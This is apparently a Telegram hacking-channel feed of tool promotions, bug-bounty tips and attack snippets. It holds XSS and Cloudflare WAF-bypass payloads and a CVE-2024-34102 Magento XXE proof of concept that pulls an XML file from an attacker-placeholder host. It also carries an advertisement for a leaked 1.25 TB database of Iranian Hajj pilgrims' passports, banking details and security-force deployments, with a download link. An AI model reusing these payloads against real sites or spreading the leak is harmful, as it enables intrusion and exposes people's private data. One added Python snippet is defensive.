Experts warn of a new ATM malware family that is advertised in the cybercrime underground; it was developed to target Europe.
🌎 Blog
#ATM #Malware #News
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
#CVE #Exploit #Cnext
DOMAINIM
💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file
🔼 Installation:
cd domainim
nimble build
💻 Usage:
./domainim <domain> [--ports=<ports>]
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
📂 Examples:
⚪️ ./domainim nmap.org --ports=all
⚪️ ./domainim google.com --ports=none --dns=8.8.8.8#53
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
⚪️ ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json
⚪️ ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
😸 Github
⬇️ Download
🔒
#Pentest #RedTeam #Tools
GAP Burp Extension
💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
🔼 Installation:
⚪️ Visit Jython Official Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
⚪️ Download the GAP.py and requirements.txt from this project and place in the same directory.
⚪️ Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.
💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ You can right click a request or response in any other context and select GAP from the Extensions menu.
😸 Github
⬇️ Download
🔒
#BurpSuite #Extensions
LazyEgg - Hunting JS Files
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : $1\n" && python lazyegg.py "$1" --js_urls --domains --ips' _ {}
#BugBounty #Tips #CyberSec
Cross Site Scripting Xss Payload
Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
#XSS #Payload
In short, we have the following from the pilgrims during the years 1363 to 1403:
- Name, surname, father's name, date of birth, place of birth, birth certificate number, national code, national card series, marital status, occupation
- Contact information (home and work address, postal code, landline and mobile phone)
- Detailed inquiry information from the passport police (passport number, date of issuance and expiration) + passport scan
- 3x4 photo of pilgrims
- Visitor flight information
- Pilgrim insurance information
- Bail document information
- Banking and payment information
- Complete information of Hajj brokers
- Information about the accommodation status of pilgrims
- Full details of government and government officials
- Full details of quota dispatch, such as the families of the martyrs
- Full details of deployment of Naja forces
- Full details of deployment of Basij forces
- Full details of spiritual missions
- The source code of the organization's programs and services
Total data volume: 1.25 TB
https://mega.nz/file/sYg0AT7C#fbfecMm0TJSx5MF25dU5TUK8mZvdzkKhKRTsQJCs-F0
#Haj #News
Bypassing WAF through a large number of characters is a successful method
#Bypass #Waf
🕵️ Eyes is an OSINT tool to get existing accounts from an email
About:
Eyes is an OSINT tool based on account search from an email address.
Eyes is able to find not only if an account exists on different sites but also to find the account in question (with certain modules),
even if the profile has nothing to do with the email 😲!
All this without warning the target 🕵️
📊 Features of script:
⚪️ fully async
⚪️ asynchronous scraping
⚪️ menu in CLI format (commands)
📂 Requirements / Launch:
⚪️ Python 3
⚪️ Git
⚪️ New terminal (to display emojis) # only for Windows
💻 Usage:
usage: eyes.py [-h] [-m] [email]
positional arguments:
  email          search information on the target email with modules, services...
options:
  -h, --help     show this help message and exit
  -m, --modules  gives you all the email modules used by Eyes
😸 Github
⬇️ Download
🔒
#Osint #Email
payload
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">
<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">
#Payload
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
#CVE #POC
A Cloudflare WAF bypass combining simple (but efficient) tricks
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
#CF #WAF #Bypass #Payload
Bug-Bounty-Wordlists
⬇️ Download
🔒
#BugBounty #Wordlist
This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.
#News #Scam #Alert
excludeparked
💬
A lightweight Python 3 script that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).
This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.
🔼 Install:
cd excludeparked
pip install -r requirements.txt
💻 Usage:
python3 ./excludeparked.py -h
😸 Github
⬇️ Download
🔒
#Python #Parked #Domain
Simple Low-Hanging Bug:
Cache purge requests are not authenticated.
→ curl -X PURGE https://target[.]evil[.]com
→ curl -s -D - https://target[.]evil[.]com -o /dev/null
#BugBounty #Tips
XSS WAF Bypass by multi-char HTML entities
&fjlig; translates to fj
&nvgt; translates to > + [?]
&nvlt; translates to < + [?]
[?] - Unicode symbol
#BugBounty #Tips
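An added example, not part of the original post, of the filter-side consequence: input has to be entity-decoded before it is matched, because these named references expand to a metacharacter plus a combining mark. The function names and sample strings are constructed for illustration; it assumes Python's html.unescape, which implements the HTML5 named character reference table.

```python
import html
import unicodedata

# Characters an HTML-context filter typically looks for.
META = set("<>\"'`")


def filter_view(value, max_rounds=3):
    """Return the form of `value` a filter should inspect.

    Character references are decoded repeatedly (bounded, to cover
    double encoding such as &amp;nvlt;), then combining marks are
    dropped so '<' + U+20D2 is seen as a plain '<'. Use the result for
    matching only; stripping marks would damage legitimate text.
    """
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return "".join(
        ch for ch in value if unicodedata.category(ch) not in ("Mn", "Me")
    )


def hidden_meta(value):
    """Metacharacters that appear only after decoding, i.e. ones a
    filter matching on the raw string would never see."""
    return (META & set(filter_view(value))) - set(value)


if __name__ == "__main__":
    # Constructed sample inputs using the three entities from the post.
    for sample in ("&nvlt;b&nvgt;", "&amp;nvlt;b", "&fjlig;ord", "plain text"):
        print(repr(sample), "->", repr(filter_view(sample)),
              sorted(hidden_meta(sample)))
```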
dnsX
A fast and multi-purpose DNS toolkit designed for running DNS queries
💬
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.
📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support
🔼 Installation:
dnsx requires go1.21 to install successfully. Run the following command to install the latest version:
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
💻 Usage:
dnsx -h
😸 Github
⬇️ Download
🔒
#cli #dns #bruteforce #wildcard